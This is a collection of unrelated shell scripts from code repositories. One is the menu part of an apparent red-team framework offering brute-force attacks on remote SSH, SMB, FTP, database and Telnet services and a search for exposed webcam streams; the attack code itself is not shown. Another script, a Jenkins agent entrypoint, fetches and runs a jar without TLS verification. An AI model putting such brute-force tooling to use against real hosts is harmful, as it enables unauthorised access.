echo " ${RedF}:${BlueF}USER${RedF}:${white}$user ${BlueF}ENV${RedF}:${white}$EnV ${BlueF}INTERFACE${RedF}:${white}$InT3R ${BlueF}ARCH${RedF}:${white}$ArCh ${BlueF}DISTRO${RedF}:${white}$DiStRo ${BlueF}HOSTNAME${RedF}:${white}$htn"${Reset};
cat << !
╔──────────╦───────────────────────╦────────────────────────────────────────╗
║ OPTION ║ RESOURCE FILE ║ DESCRIPTION ║
╠──────────╬───────────────────────╬────────────────────────────────────────╣
║ 1 ║ geo_location ║ scan remote hosts geo location ║
║ 2 ║ brute_force ║ scan - brute most common ports ║
║ 3 ║ ms17_010 ║ scan - brute remote smb service ║
║ 4 ║ ssh_brute ║ scan - brute remote ssh service ║
║ 5 ║ ftp_brute ║ scan - brute remote ftp service ║
║ 6 ║ http_cve ║ scan - brute remote http service ║
║ 7 ║ winrm_brute ║ scan - brute remote winrm service ║
║ 8 ║ mysql_brute ║ scan - brute remote mysql service ║
║ 9 ║ mssql_brute ║ scan - brute remote mssql service ║
║ 10 ║ telnet_brute ║ scan - brute remote telnet service ║
║ 11 ║ rpc_brute ║ scan - brute remote rpc service ║
║ 12 ║ snmp_brute ║ scan - brute remote snmp service ║
║ 13 ║ postgres_brute ║ scan - brute remote postgres serv ║
║ 14 ║ rtsp_url_brute ║ scan for remote live webcam's url's ║
╠──────────╩───────────────────────╩────────────────────────────────────────╣
║ E - Exit mosquito ║
╚───────────────────────────────────────────────────────────────────────────╣
Suspicious-Shell-Activity©🦟redteam @2019🦟╝
!
echo "${BlueF}[☠]${white} mosquito framework"${Reset}
sleep 1
echo -n "${BlueF}[${GreenF}➽${BlueF}]${white} Chose Option number${RedF}:${white}"${Reset}
read choice
case $choice in
1)
sh_one # geo_location function
;;
2)
sh_two # most common ports brute force function
;;
3)
sh_tree # ms17_010 (smb) function
;;
4)
sh_quatro # SSH function
;;
5)
sh_cinco # FTP function
;;
6)
sh_six # HTTP CVE function
;;
7)
sh_seven # WINRM snmp function
;;
8)
sh_oito # MYSQL function
;;
9)
sh_nine # MSSQL function
;;
10)
sh_ten # TELNET function
;;
11)
sh_onze # RPC function
;;
12)
sh_twelve # SNMP function
;;
13)
sh_treze # POSTGRES function
;;
14)
sh_quatorze # RTSP (webcams) function
;;
easter_egg)
## Mosquito Hidden option
# whitehat - search for vuln's/cve's in local lan
sh_easter_egg
;;
e|E)
echo "${BlueF}[${YellowF}i${BlueF}]${white} Closing framework 🦟Bzzzz."${Reset};
service postgresql stop | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Stopping postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
rm -f ip_range.txt > /dev/null 2>&1
exit
;;
h|H)
echo "${BlueF}[${YellowF}i${BlueF}] [${YellowF}EXECUTE${BlueF}] sudo ./mosquito.sh -h"${Reset};
service postgresql stop | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Stopping postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
exit
;;
*)
echo "${BlueF}[${RedF}x${BlueF}]${white} '${RedF}$choice${white}': is not a valid Option 🦟Bzzzz."${Reset};
sleep 2 && sh_main
;;
esac
done
| true |
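Every sh_* function above repeats the same clamp on the user-supplied host limit (zenity prompt, compare against 1024, reset to the maximum). A shared helper, as a sketch that keeps the script's variable names, would collapse those twelve copies into one:

# Sketch: clamp the LIMMIT value once, reuse in every sh_* function.
clamp_limit () {
    max=1024
    value="$1"
    case "$value" in (''|*[!0-9]*) value=$max ;; esac  # empty/non-numeric -> max
    [ "$value" -gt "$max" ] && value=$max
    echo "$value"
}
# usage inside each function: sealing=$(clamp_limit "$sealing")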
1686fee9b4a847688c8135bae1a25726a66ea7fd
|
Shell
|
ua-eas/ksi
|
/components/jdk/jdk-1.6.0_37/_install.sh
|
UTF-8
| 1,955 | 3.578125 | 4 |
[] |
no_license
|
#
# component install script for jdk-1.6.0_37
#
# n.b. This install includes the third-party jtool.jar library,
# which is distributed separately from the main JDK.
#
#
# Globals.
distfile="jdk-6u37-linux-x64.bin"
unpacksto="jdk1.6.0_37"
jtooljar="jtool-0.1-SNAPSHOT.jar"
#
# Make the component build and log directories.
echo "[-install-] Creating ${COMPONENT_VERSION_BUILDDIR} ..."
mkdir -p ${COMPONENT_VERSION_BUILDDIR}
echo "[-install-] Creating ${COMPONENT_BUILDLOGSDIR} ..."
mkdir -p ${COMPONENT_BUILDLOGSDIR}
#
# Copy the distribution file to it.
echo "[-install-] Copying ${INSTALLER_COMPONENT_VERSIONDIR}/${distfile} to ${COMPONENT_VERSION_BUILDDIR} ..."
cp ${INSTALLER_COMPONENT_VERSIONDIR}/${distfile} ${COMPONENT_VERSION_BUILDDIR}
#
# Turn on execute bit.
echo "[-install-] Turning on execute bit ..."
chmod +x ${COMPONENT_VERSION_BUILDDIR}/${distfile}
#
# Change directory and execute to install, including minor hacks
# to fix stupid Oracle interactive install process.
echo "[-install-] Executing distribution package ..."
thisdir=`pwd`
cd ${COMPONENT_VERSION_BUILDDIR}
echo "yes" > answers.txt
./${distfile} < ./answers.txt > /dev/null
cd ${thisdir}
#
# Move unpacked distribution to become component home directory.
echo "[-install-] Moving to component home directory ..."
mkdir -p ${COMPONENT_INSTALLDIR}
mv ${COMPONENT_VERSION_BUILDDIR}/${unpacksto} ${COMPONENT_HOME}
#
# Add in local jtool library for service monitoring.
echo "[-install-] Adding in local jtool library ..."
mkdir -p ${COMPONENT_HOME}/local
cp ${INSTALLER_COMPONENT_VERSIONDIR}/${jtooljar} ${COMPONENT_HOME}/local/jtool.jar
#
# Add component configuration.
echo "[-install-] Adding component configuration ..."
mkdir -p ${COMPONENT_CONFIG}
process_template ${INSTALLER_COMPONENT_PROFILE_TMPL} > ${COMPONENT_PROFILE}
# Add component base.
echo "[-install-] Adding component base structure ..."
mkdir -p ${COMPONENT_BASE}
mkdir -p ${COMPONENT_LOGS}
| true |
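Because the Oracle installer runs non-interactively with piped answers, an unpack failure here is easy to miss. A post-install sanity check, as a sketch reusing the script's COMPONENT_HOME variable:

# Sketch: confirm the JDK actually unpacked and runs.
echo "[-install-] Verifying java binary ..."
if [ -x "${COMPONENT_HOME}/bin/java" ]; then
    "${COMPONENT_HOME}/bin/java" -version
else
    echo "[-install-] ERROR: no java binary under ${COMPONENT_HOME}" 1>&2
    exit 1
fi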
77fc09870e9196b04762ff80024438c96ddd9017
|
Shell
|
adalisan/vsi_common
|
/tests/test-relpath.bsh
|
UTF-8
| 5,228 | 2.921875 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
. "$(dirname "${BASH_SOURCE[0]}")/testlib.bsh"
VSI_COMMON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.."; pwd)"
relpath_check()
{
# echo "python -c 'import os.path as o;print(o.relpath(\"$1\", \"$2\"))'"
# python -c "import os.path as o;print(o.relpath('$1', '$2'))"
# perl -e "use File::Spec; print File::Spec->abs2rel('${1}','${2}');"; echo
# echo "$(relpath "${1}" "${2}")"
[ "$(relpath "${1}" "${2}")" == "${3}" ]
[ "$(relpath "${1}/" "${2}")" == "${3}" ]
[ "$(relpath "${1}" "${2}/")" == "${3}" ]
[ "$(relpath "${1}/" "${2}/")" == "${3}" ]
}
common_relpath_test()
{
relpath_check '/ a b/å/⮀*/!' '/ a b/å/⮀/xäå/?' '../../../⮀*/!'
relpath_check '/' '/A' '..'
relpath_check '/A' '/' 'A'
relpath_check '/ & / !/*/\\/E' '/' ' & / !/*/\\/E'
relpath_check '/' '/ & / !/*/\\/E' '../../../../..'
relpath_check '/ & / !/*/\\/E' '/ & / !/?/\\/E/F' '../../../../*/\\/E'
relpath_check '/X/Y' '/ & / !/C/\\/E/F' '../../../../../../X/Y'
relpath_check '/ & / !/C' '/A' '../ & / !/C'
relpath_check '/A / !/C' '/A /B' '../ !/C'
relpath_check '/Â/ !/C' '/Â/ !/C' '.'
relpath_check '/ & /B / C' '/ & /B / C/D' '..'
relpath_check '/ & / !/C' '/ & / !/C/\\/Ê' '../..'
relpath_check '/Å/ !/C' '/Å/ !/D' '../C'
relpath_check '/.A /*B/C' '/.A /*B/\\/E' '../../C'
relpath_check '/ & / !/C' '/ & /D' '../ !/C'
relpath_check '/ & / !/C' '/ & /\\/E' '../../ !/C'
relpath_check '/ & / !/C' '/\\/E/F' '../../../ & / !/C'
relpath_check /home/part1/part2 /home/part1/part3 '../part2'
relpath_check /home/part1/part2 /home/part4/part5 '../../part1/part2'
relpath_check /home/part1/part2 /work/part6/part7 '../../../home/part1/part2'
relpath_check /home/part1 /work/part1/part2/part3/part4 '../../../../../home/part1'
relpath_check /home /work/part2/part3 '../../../home'
relpath_check / /work/part2/part3/part4 '../../../..'
relpath_check /home/part1/part2 /home/part1/part2/part3/part4 '../..'
relpath_check /home/part1/part2 /home/part1/part2/part3 '..'
relpath_check /home/part1/part2 /home/part1/part2 '.'
relpath_check /home/part1/part2 /home/part1 'part2'
relpath_check /home/part1/part2 /home 'part1/part2'
relpath_check /home/part1/part2 / 'home/part1/part2'
relpath_check /home/part1/part2 /work '../home/part1/part2'
relpath_check /home/part1/part2 /work/part1 '../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2 '../../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2/part3 '../../../../home/part1/part2'
relpath_check /home/part1/part2 /work/part1/part2/part3/part4 '../../../../../home/part1/part2'
relpath_check home/part1/part2 home/part1/part3 '../part2'
relpath_check home/part1/part2 home/part4/part5 '../../part1/part2'
relpath_check home/part1/part2 work/part6/part7 '../../../home/part1/part2'
relpath_check home/part1 work/part1/part2/part3/part4 '../../../../../home/part1'
relpath_check home work/part2/part3 '../../../home'
relpath_check . work/part2/part3 '../../..'
relpath_check home/part1/part2 home/part1/part2/part3/part4 '../..'
relpath_check home/part1/part2 home/part1/part2/part3 '..'
relpath_check home/part1/part2 home/part1/part2 '.'
relpath_check home/part1/part2 home/part1 'part2'
relpath_check home/part1/part2 home 'part1/part2'
relpath_check home/part1/part2 . 'home/part1/part2'
relpath_check home/part1/part2 work '../home/part1/part2'
relpath_check home/part1/part2 work/part1 '../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2 '../../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2/part3 '../../../../home/part1/part2'
relpath_check home/part1/part2 work/part1/part2/part3/part4 '../../../../../home/part1/part2'
}
begin_test "relpath function"
(
setup_test
. "${VSI_COMMON_DIR}/linux/relpath"
[ "$(type -t relpath)" = "function" ]
common_relpath_test
)
end_test
begin_test "relpath CLI"
(
setup_test
[ "$(type -t relpath)" = "file" ]
relpath_check home/part1/part2 work/part1/part2 '../../../home/part1/part2'
)
end_test
| true |
f3591c8b9a83f79cc6721ae49b28256fb1f8589d
|
Shell
|
hedonproject/Masternode-Installer
|
/script.sh
|
UTF-8
| 4,033 | 3.40625 | 3 |
[] |
no_license
|
#!/bin/bash
INFO='\033[0;36m'
ERROR='\033[0;31m'
SUCCESS='\033[0;32m'
DEFAULT='\033[0m'
printf "${INFO}==================================================================\n"
printf " Hedon Masternode Installer\n"
printf "==================================================================${DEFAULT}\n"
printf "${SUCCESS}Choose your Masternode name:${DEFAULT}\n"
read NODENAME
printf "${SUCCESS}Enter your Masternode Private key${DEFAULT}\n"
read NODEKEY
until [ "${#NODEKEY}" -eq 51 ]; do
printf "${ERROR}Double check your Masternode Private key and try again:${DEFAULT}\n"
read NODEKEY
done
printf "${SUCCESS}Enter your Masternode Transaction ID:${DEFAULT}\n"
read NODETX
until [ "${#NODETX}" -eq 64 ]; do
printf "${ERROR}Double check your Masternode Transaction ID and try again:${DEFAULT}\n"
read NODETX
done
printf "${SUCCESS}Please enter your Masternode Transaction Index:${DEFAULT}\n"
read NODETXI
until [[ "$NODETXI" =~ ^[0-9]+$ ]]; do
printf "${ERROR}Double check your Masternode Transaction Index and try again:${DEFAULT}\n"
read NODETXI
done
printf "${SUCCESS}Installing packages and updates${DEFAULT}\n"
sudo apt-get update
sudo add-apt-repository ppa:bitcoin/bitcoin -y
sudo apt-get update
sudo apt-get install ufw -y
sudo apt-get install git -y
sudo apt-get install nano -y
sudo apt-get install pwgen -y
sudo apt-get install dnsutils -y
sudo apt-get install zip unzip -y
sudo apt-get install libzmq3-dev -y
sudo apt-get install libboost-all-dev -y
sudo apt-get install libminiupnpc-dev -y
sudo apt-get install build-essential libssl-dev libminiupnpc-dev libevent-dev -y
sudo apt-get install libdb4.8-dev libdb4.8++-dev -y
PORT="5404"
PASS=$(pwgen -1 20 -n)
VPSIP=$(dig +short myip.opendns.com @resolver1.opendns.com)
printf "${SUCCESS}Setting up locales${DEFAULT}\n"
export LANG="en_US.utf8"
export LANGUAGE="en_US.utf8"
export LC_ALL="en_US.utf8"
printf "${SUCCESS}Checking for old Hedon files${DEFAULT}\n"
cd ~/
if pgrep -x "hedond" > /dev/null
then
printf "${ERROR}Killing old Hedon process${DEFAULT}\n"
kill -9 $(pgrep hedond)
fi
if [ -d "Daemon" ]; then
rm -r Daemon
printf "${ERROR}Removed old Hedon core${DEFAULT}\n"
fi
if [ -d ".hedoncore" ]; then
rm -r .hedoncore
printf "${ERROR}Removed old Hedon data${DEFAULT}\n"
fi
printf "${SUCCESS}Downloading and setting up a new wallet instance${DEFAULT}\n"
cd ~/
wget "https://github.com/hedonproject/Hedon/releases/download/1.0.1.1/hedon-v1.0.1.1-daemon.zip"
unzip ~/hedon-v1.0.1.1-daemon.zip
rm -r ~/hedon-v1.0.1.1-daemon.zip
cd Daemon
chmod ugo+x hedond
chmod ugo+x hedon-cli
chmod ugo+x hedon-tx
printf "${SUCCESS}Setting up ${NODENAME}${DEFAULT}\n"
mkdir ~/.hedoncore
cat <<EOF > ~/.hedoncore/hedon.conf
rpcuser=Hedon
rpcpassword=${PASS}
rpcallowip=127.0.0.1
#----------------------------
listen=1
server=1
daemon=1
maxconnections=64
#----------------------------
masternode=1
masternodeprivkey=${NODEKEY}
externalip=${VPSIP}
EOF
printf "${SUCCESS}Starting up Hedon Daemon${DEFAULT}\n"
sudo ufw allow 5404
sudo ufw allow 5405
~/Daemon/hedond
printf "${SUCCESS}==================================================================${DEFAULT}\n"
printf "${SUCCESS}Paste the following line into masternode.conf of your desktop wallet:${DEFAULT}\n\n"
printf "${ERROR}${NODENAME} ${VPSIP}:${PORT} ${NODEKEY} ${NODETX} ${NODETXI}${DEFAULT}\n\n"
printf "${SUCCESS}Installed with VPS IP ${ERROR}${VPSIP}${SUCCESS} on port ${ERROR}${PORT}${DEFAULT}\n"
printf "${SUCCESS}Installed with Masternode Key ${ERROR}${MNKEY}${DEFAULT}\n"
printf "${SUCCESS}Installed with Masternode TXID ${ERROR}${MNTX}${SUCCESS} index ${ERROR}${MNTXI}${DEFAULT}\n"
printf "${SUCCESS}Installed with RPCUser=${ERROR}Hedon${DEFAULT}\n"
printf "${SUCCESS}Installed with RPCPassword=${ERROR}${PASS}${DEFAULT}\n"
printf "${SUCCESS}==================================================================${DEFAULT}\n"
| true |
94b18d9799bfa8bd7c138f65da5b61d19bcfbb62
|
Shell
|
amire80/cxscripts
|
/count_deletion_range.sh
|
UTF-8
| 122 | 3.0625 | 3 |
[
"CC0-1.0"
] |
permissive
|
#!/bin/bash
firstDay=$1
lastDay=$2
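# Example (hypothetical date arguments): ./count_deletion_range.sh 20180101 20180107
# eval is needed below because brace expansion happens before variable
# expansion, so a literal {$firstDay..$lastDay} would never expand.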
for date in $(eval echo "{$firstDay..$lastDay}")
do
./count_deletion.sh $date
done
| true |
27948c163e983a0e6e5102b6d25776e6d1090896
|
Shell
|
seckindinc/ShellScripting
|
/Projects_Back_up
|
UTF-8
| 188 | 2.625 | 3 |
[] |
no_license
|
#!/bin/bash
TIME=`date +%b-%d-%y`
FILENAME=backup-$TIME.tar.gz
SRCDIR=/home/seckindinc/Desktop/Projects
DESDIR=/home/seckindinc/Backup/Projects-Backup
tar -cpzf $DESDIR/$FILENAME $SRCDIR
| true |
07072e0472ba8155061c56ba5fd767014710bd1c
|
Shell
|
RitikaTanwani/College_Documents
|
/Documents/1st yr/05-shell_scripting-examples/scripts/ls.sh
|
UTF-8
| 72 | 2.515625 | 3 |
[] |
no_license
|
#! /bin/bash
lsout=`ls -l`
for i in $lsout
do
echo $i" foobar"
done
| true |
922ddb6e5bf9b43b4e0786bc77d3a35c7dd72f5a
|
Shell
|
bluemarvin/ascripts
|
/maven.sh
|
UTF-8
| 174 | 2.59375 | 3 |
[] |
no_license
|
#!/bin/bash
TARGET=$1
if [ -z "$TARGET" ] ; then
TARGET="/Volumes/firefox/vr/obj-arm-linux-androideabi/gradle/build/mobile/android/geckoview"
fi
cd $TARGET && simple-server.sh
| true |
a75d2dbb4e8b88085a44ae1e66e166ad82c0d4b8
|
Shell
|
jorgeborges/dotfiles
|
/oh-my-zsh/themes/jborges.zsh-theme
|
UTF-8
| 1,806 | 3 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
#local return_code="%(?..%{$fg[red]%}%? ↵%{$reset_color%})"
# Altera by Jorge Borges
# Use with a dark background and 256-color terminal!
# You can set your computer name in the ~/.box-name file if you want.
# Borrowing shamelessly from these oh-my-zsh themes:
# fino
# bira
# robbyrussell
# muse
# ingo
#
# Also borrowing from http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/
setopt promptsubst
autoload -U add-zsh-hook
function prompt_char {
#git status >/dev/null 2>/dev/null && echo '± ' && return
#hg root >/dev/null 2>/dev/null && echo '☿ ' && return
echo "%{$fg[red]%}❯%{$reset_color%}%{$fg[yellow]%}❯%{$reset_color%}%{$fg[cyan]%}❯%{$reset_color%} "
}
function box_name {
[ -f ~/.box-name ] && cat ~/.box-name || hostname -s
}
local rvm_ruby='‹$(rvm-prompt i v g)›%{$reset_color%}'
local current_dir='${PWD/#$HOME/~}'
local git_info='$(git_prompt_info)'
PROMPT="%{$FG[040]%}%n%{$reset_color%}%{$FG[239]%}@%{$reset_color%}%{$FG[033]%}$(box_name)%{$reset_color%} %{$FG[239]%}in%{$reset_color%} %{$terminfo[bold]$FG[226]%}${current_dir} %{$reset_color%}${git_info}
%F{green}$(prompt_char)%f"
ZSH_THEME_GIT_PROMPT_PREFIX="%{$FG[051]%}\uE0A0:%{$reset_color%} "
ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_DIRTY=" %{$fg[red]%}✗%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_CLEAN=" %{$fg[green]%}✔%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_ADDED="%{$fg[082]%}✚%{$reset_color%}a"
ZSH_THEME_GIT_PROMPT_MODIFIED="%{$fg[166]%}✹%{$reset_color%}m"
ZSH_THEME_GIT_PROMPT_DELETED="%{$fg[160]%}✖%{$reset_color%}d"
ZSH_THEME_GIT_PROMPT_RENAMED="%{$fg[220]%}➜%{$reset_color%}r"
ZSH_THEME_GIT_PROMPT_UNMERGED="%{$fg[082]%}═%{$reset_color%}um"
ZSH_THEME_GIT_PROMPT_UNTRACKED="%{$fg[190]%}✭%{$reset_color%}ut"
| true |
2026facec402d0c876afe5bd83a9bfd34e86f1d4
|
Shell
|
Ahebert76/Jamf-Extension-Attributes
|
/Printer Installer Version
|
UTF-8
| 223 | 2.953125 | 3 |
[] |
no_license
|
#!/bin/bash
PrinterInstallerInfo=$(cat /opt/PrinterInstallerClient/VERSION)
if [ ! -z "$PrinterInstallerInfo" ] ; then
echo "<result>$PrinterInstallerInfo</result>"
else
echo "<result>not found</result>"
fi
exit 0
| true |
00586e51b2c7e3941843e8fba32d6826595aa873
|
Shell
|
JoepSchyns/visual_scientific_search
|
/server/data/script.sh
|
UTF-8
| 1,285 | 3.046875 | 3 |
[] |
no_license
|
#!/bin/sh
#find . -name "s2-corpus-*" -print -exec gunzip -k -S ".json" {} /; -exec
#&& gunzip *.gz &&
#find . -name "s2-corpus-*" -print -exec mongoimport --numInsertionWorkers 2 --db search --collection semanticscholar --file {} \; -exec rm {} \;
#find . -name "s2-corpus-*" -print -exec curl -XPOST 'localhost:9200/search/semanticscholar/_bulk?pretty' -T {} \; -exec rm {} \;
#wget -i manifest.txt -B https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/
for f in $(find . -name "*.gz"); do
temp_dir = "./temp";
file_name="$f.json";
gunzip -k "$f" > "$temp_dir/$file_name";
cd temp_dir;
echo $file_name;
split $file_name "$file_name-" -l 5000 -a 3 -d;
for fs in $(find . -name "$file_name-*"); do
echo $fs;
sed 's/^/{"index":{}}\n/' "$fs" > "$fs-i";
echo "$fs-i";
curl -XPOST -H 'Content-Type: application/json' 'localhost:9200/search/semanticscholar/_bulk?pretty' --data-binary "@$fs-i";
done
DATE=`date '+%Y-%m-%d %H:%M:%S'`;
echo "$f $DATE" >> completed.log;
cd ../;
rm -R "$temp_dir";
echo "sample:";
echo curl -H 'Content-Type: application/json' localhost:9200/search/semanticscholar/_search?pretty -d '{"size":1,"query": {"match_all": {}}}';
done
# mv filename temp
# (echo abcdef ; cat temp ; echo ghijkl) > filename
# rm temp
| true |
8663705b5046d095aa418b99abf067df466b31d1
|
Shell
|
alde/setup
|
/scripts/rvm.sh
|
UTF-8
| 423 | 3.46875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
rvmDir="${HOME}/.rvm"
rubyver="2.5"
info "[ruby] Setting up ruby ${rubyver}"
if [ -d ${rvmDir} ] ; then
notice "[rvm] already installed - skipping"
else
gpg2 --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
curl -sSL https://get.rvm.io | bash -s stable
source "${HOME}/.rvm/scripts/rvm"
rvm install "${rubyver}"
fi
info "[ruby] done"
| true |
0af7284aefd6d9d9311a6d4ae91fc5066104e11f
|
Shell
|
ant104247/Mastering-Linux-Shell-Scripting-Second-Edition
|
/Chapter06/hello9.sh
|
UTF-8
| 95 | 2.796875 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
echo "You are using $(basename $0)"
for n in $*
do
echo "Hello $n"
done
exit 0
| true |
4465571cb13edc17c3ef06191d4f167f0c6860ea
|
Shell
|
cloutainer/k8s-jenkins-slave-base
|
/docker-entrypoint.sh
|
UTF-8
| 1,848 | 3.453125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
#
# UMASK
#
umask u+rxw,g+rwx,o-rwx
#
# USER
#
RUNAS=$(whoami)
echo "DOCKER-ENTRYPOINT >> running as user: ${RUNAS}"
#
# IMPORT KUBERNETES ca.crt (OPTIONAL)
#
if [ -n "$KUBERNETES_CA_BASE64" ]
then
echo $KUBERNETES_CA_BASE64 | base64 --decode > /tmp/kube-ca.crt
echo "DOCKER-ENTRYPOINT >> KUBERNETES_CA_BASE64 ENV VAR > importing kubernetes ca certificate to java keystore."
cat /tmp/kube-ca.crt
keytool -importcert -keystore /etc/ssl/certs/java/cacerts -alias kubernetes -file /tmp/kube-ca.crt -storepass changeit -noprompt
else
echo "DOCKER-ENTRYPOINT >> KUBERNETES_CA_BASE64 ENV VAR > not set. SKIPPING importing of kubernetes ca certificate."
fi
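# For reference, a suitable KUBERNETES_CA_BASE64 value can be produced with
# something like (assuming the standard in-cluster service-account CA path):
#   base64 -w0 /var/run/secrets/kubernetes.io/serviceaccount/ca.crt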
#
# ENTRYPOINT-HOOK (CHILD IMAGE)
#
echo "DOCKER-ENTRYPOINT >> starting entrypoint hook"
source /opt/docker-entrypoint-hook.sh
#
# JENKINS SLAVE JNLP
#
echo "DOCKER-ENTRYPOINT >> config: JENKINS_NAME: $JENKINS_NAME"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_SECRET: $JENKINS_SECRET"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_URL: $JENKINS_URL"
echo "DOCKER-ENTRYPOINT >> config: JENKINS_JNLP_URL: $JENKINS_JNLP_URL"
if [ -n "$REMOTING_JAR_URL" ]
then
echo "DOCKER-ENTRYPOINT >> downloading jenkins-slave.jar from USER SPECIFIED URL"
echo "DOCKER-ENTRYPOINT >> ${REMOTING_JAR_URL}"
curl -sSLko /tmp/jenkins-slave.jar $REMOTING_JAR_URL
else
echo "DOCKER-ENTRYPOINT >> downloading jenkins-slave.jar from Jenkins"
echo "DOCKER-ENTRYPOINT >> ${JENKINS_URL}/jnlpJars/slave.jar"
curl -sSLko /tmp/jenkins-slave.jar ${JENKINS_URL}/jnlpJars/slave.jar
fi
echo "DOCKER-ENTRYPOINT >> establishing JNLP connection with Jenkins via JNLP URL"
exec java $JAVA_OPTS -cp /tmp/jenkins-slave.jar \
hudson.remoting.jnlp.Main -headless \
-workDir /home/jenkins/agent/ \
-url $JENKINS_URL $JENKINS_SECRET $JENKINS_NAME
| true |
6a3eb32a266ed6a23a2de71f9ae5f2688d769a42
|
Shell
|
m4r35n357/ODE-Playground
|
/cns-scan
|
UTF-8
| 1,512 | 3.609375 | 4 |
[] |
no_license
|
#!/bin/sh
#
# (c) 2018-2023 [email protected] (Ian Smith), for licencing see the LICENCE file
args="$0 $*"
echo "args: \033[1;37m$(($# + 1))\033[0;37m, [ \033[0;35m$args\033[0;37m ]" >&2
user_dir="/tmp/$USER"
[ ! -d $user_dir ] && mkdir $user_dir
user_data="$user_dir/data"
max=$1
threshold=$2
shift 2
case $4 in
"_") ;;
*) echo '"order" argument should be set to "_"'; exit 1;;
esac
timestep=$5
steps=$6
. ./cns-functions.sh
processed="$(get_precision $*)"
n=2
while [ $n -le $max ]
do
set $processed
begin="$1 $2 $3"
shift 4
current="$begin $n $*"
halfstep $current
$current >$fileB &
wait
temp=$(./divergence $fileA $fileB $threshold)
case $temp in
'') echo $n "Still within tolerance of $threshold - increase simulation time?"
exit 1;;
*) set $temp
echo $n $4 $6;;
esac
n=$((n + 1))
done 2>/dev/null | tee $user_data
max_clean=$(echo "scale=2; $timestep * $steps;" | /usr/bin/bc)
set $(tail -1 $user_data)
max_cpu=$(echo "scale=2; 1.5 * $3;" | /usr/bin/bc)
/usr/bin/gnuplot -p << EOF
set terminal wxt background rgb "grey85"
set title noenhanced '$args'
set key left
set ytics nomirror
set y2tics
set xlabel 'Taylor Series Order'
set ylabel 'Clean Simulation Time, model units'
set y2label 'CPU Time, seconds'
set style fill solid border -1
set xrange [0:]
set yrange [0:'$max_clean']
set y2range [0:'$max_cpu']
plot '$user_data' using 1:2 axes x1y1 title 'CNS' with boxes, '' u 1:3 axes x1y2 t 'CPU' w boxes
EOF
| true |
bbc20069ecad7881902d70c3e8d322a03e7c3e7e
|
Shell
|
feidianbo/origin-server
|
/node/misc/bin/setup_pam_fs_limits.sh
|
UTF-8
| 3,522 | 3.921875 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Sets up the PAM filesystem and quota limits for an OpenShift gear
#
#
# Add a PAM limit set to the user
#
# IN: username
# IN: limits_order
# IN: limits_nproc
#
LIMITSVARS="core data fsize memlock nofile rss stack cpu nproc as maxlogins priority locks sigpending msgqueue nice rprio"
function set_pam_limits {
USERNAME=$1
#assume these come from sourced config file into environment
#LIMITS_ORDER=${2:-$limits_order}
#LIMITS_NPROC=${3:-$limits_nproc}
LIMITSFILE=/etc/security/limits.d/${limits_order}-${USERNAME}.conf
if [ -z "${NOOP}" ]
then
cat <<EOF > ${LIMITSFILE}
# PAM process limits for guest $USERNAME
# see limits.conf(5) for details
#Each line describes a limit for a user in the form:
#
#<domain> <type> <item> <value>
EOF
else
echo "cat <<EOF > ${LIMITSFILE}
# PAM process limits for guest $USERNAME
# see limits.conf(5) for details
#Each line describes a limit for a user in the form:
#
#<domain> <type> <item> <value>
${USERNAME} hard nproc ${limits_nproc}
EOF"
fi
for KEY in $LIMITSVARS
do
VALUE=`eval echo \\$limits_$KEY`
if [ -n "$VALUE" ]
then
if [ -z "${NOOP}" ]
then
echo "${USERNAME} hard $KEY $VALUE" >> ${LIMITSFILE}
else
echo "echo \"${USERNAME} hard $KEY $VALUE\" >> ${LIMITSFILE}"
fi
fi
done
}
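# With the defaults set in MAIN below, the generated file
# /etc/security/limits.d/84-<username>.conf would contain, for example:
#   <username> hard nproc 100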
#
# Return the mount point of the file system for a given path
#
function get_mountpoint() {
df -P $1 2>/dev/null | tail -1 | awk '{ print $6 }'
}
# Are quotas enabled on the specified directory?
function quotas_enabled {
# DIR=$1
QUOTA_ROOT=`get_mountpoint $1`
# if you can't find the quota root for the given directory, it's not enabled
if [ -z "${QUOTA_ROOT}" ]
then
return 1
fi
quotaon -u -p $QUOTA_ROOT >/dev/null 2>&1
# quotaon returns the opposite of what you expect
# 1 = enabled, 0 = not enabled
if [ $? -eq 0 ]
then
return 1
else
return 0
fi
}
#
# Set a user's inode and block quotas on the home file system
# usage: set_fs_quota <username> <inodes> <blocks>
function set_fs_quotas {
# USERNAME=$1
# QUOTA_BLOCKS=${2:-$quota_blocks}
# QUOTA_FILES=${3:-$quota_files}
# get the user home directory
# get the quota mount point
if quotas_enabled $GEAR_BASE_DIR
then
setquota $1 0 $2 0 $3 `get_mountpoint $GEAR_BASE_DIR`
else
echo "WARNING: quotas not enabled on $GEAR_BASE_DIR" >&2
fi
}
# ============================================================================
# MAIN
# ============================================================================
# Load defaults and node configuration
source /etc/openshift/node.conf
# defaults
limits_order=84
limits_nproc=100
quota_files=1000
# a block = 1Kbytes: 1k * 1024 * 128
quota_blocks=`expr 1024 \* 128` # 128MB
# Load system configuration
source /etc/openshift/resource_limits.conf
# Allow the command line to override quota and limits
username=$1
quota_blocks_custom=$2
quota_files_custom=$3
nproc_custom=$4
if [ -n "$quota_blocks_custom" ] && [ $quota_blocks_custom -gt $quota_blocks ]
then
